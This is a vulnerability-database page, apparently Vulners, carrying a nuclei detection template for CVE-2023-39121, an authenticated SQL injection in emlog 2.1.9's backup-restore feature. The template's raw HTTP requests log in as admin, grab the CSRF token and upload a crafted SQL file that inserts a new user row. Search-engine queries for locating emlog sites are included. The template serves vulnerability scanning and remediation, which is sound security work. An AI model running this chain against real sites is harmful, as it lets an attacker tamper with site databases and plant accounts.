Lucene search
K

Emlog 2.1.9 - SQL Injection

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

Emlog version 2.1.9 exposes SQL injection through backup restore input, enabling admin-level SQL commands.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-39121
3 Aug 202320:15
attackerkb
Circl
CVE-2023-39121
4 Aug 202300:40
circl
CNNVD
emlog SQL注入漏洞
3 Aug 202300:00
cnnvd
CNVD
emlog SQL Injection Vulnerability
6 Aug 202300:00
cnvd
CVE
CVE-2023-39121
3 Aug 202300:00
cve
Cvelist
CVE-2023-39121
3 Aug 202300:00
cvelist
EUVD
EUVD-2023-42867
3 Oct 202520:07
euvd
NVD
CVE-2023-39121
3 Aug 202320:15
nvd
Prion
Sql injection
3 Aug 202320:15
prion
Positive Technologies
PT-2023-26791
3 Aug 202300:00
ptsecurity
Rows per page
id: CVE-2023-39121

info:
  name: Emlog 2.1.9 - SQL Injection
  author: wjch611
  severity: high
  description: |
    emlog v2.1.9 contains a SQL injection caused by unsanitized input in the data backup/restore functionality, allowing attackers to execute arbitrary SQL commands through crafted backup files.
  impact: |
    Attackers with admin credentials can execute arbitrary SQL commands, potentially leading to privilege escalation, data leakage, modification, or deletion.
  remediation: |
    Update to the latest version of emlog or apply security patches addressing the SQL injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39121
    - https://github.com/safe-b/CVE/issues/1#issue-1817133689
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-39121
    cwe-id: CWE-89
    epss-score: 0.02258
    epss-percentile: 0.80847
    cpe: cpe:2.3:a:emlog:emlog:2.1.9:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: emlog
    product: emlog
    shodan-query: http.title:"emlog"
    fofa-query: title="emlog"
    google-query: intitle:"emlog"
  tags: cve2023,cve,sqli,emlog,authenticated

variables:
  rand_uid: "{{rand_int(10000, 99999)}}"
  rand_marker: "{{rand_int(100000, 999999)}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  - raw:
      - |
        POST /admin/account.php?action=dosignin&s= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pw={{password}}

  - raw:
      - |
        GET /admin/data.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - 'name="token" id="token" value="([a-f0-9]{40})"'
        internal: true

  - raw:
      - |
        POST /admin/data.php?action=backup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        token={{token}}

    extractors:
      - type: dsl
        dsl:
          - "body"
        name: full_response
        internal: true

  - raw:
      - |
        POST /admin/data.php?action=import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUBHhE8PS934oJ2MP

        ------WebKitFormBoundaryUBHhE8PS934oJ2MP
        Content-Disposition: form-data; name="token"

        {{token}}
        ------WebKitFormBoundaryUBHhE8PS934oJ2MP
        Content-Disposition: form-data; name="sqlfile"; filename="emlog_test.sql"
        Content-Type: application/octet-stream

        {{full_response}}
        INSERT INTO emlog_user VALUES('{{rand_uid}}','sqli{{rand_marker}}','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.','test','writer','n','','sqli{{rand_marker}}@test.com','','','0','1687261845','1687261845');
        ------WebKitFormBoundaryUBHhE8PS934oJ2MP--

  - raw:
      - |
        GET /admin/user.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body, concat("sqli", rand_marker))
# digest: 4a0a00473045022100ec4f193a1737ce3e5cff366abe861381aed0d135b74ae86ef390fe8905a8b1c402205359a03c5b62972baacacd6ee440f8695161afc77ce71f2fddf2c4a52ec7319c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.2
EPSS0.02258
SSVC
14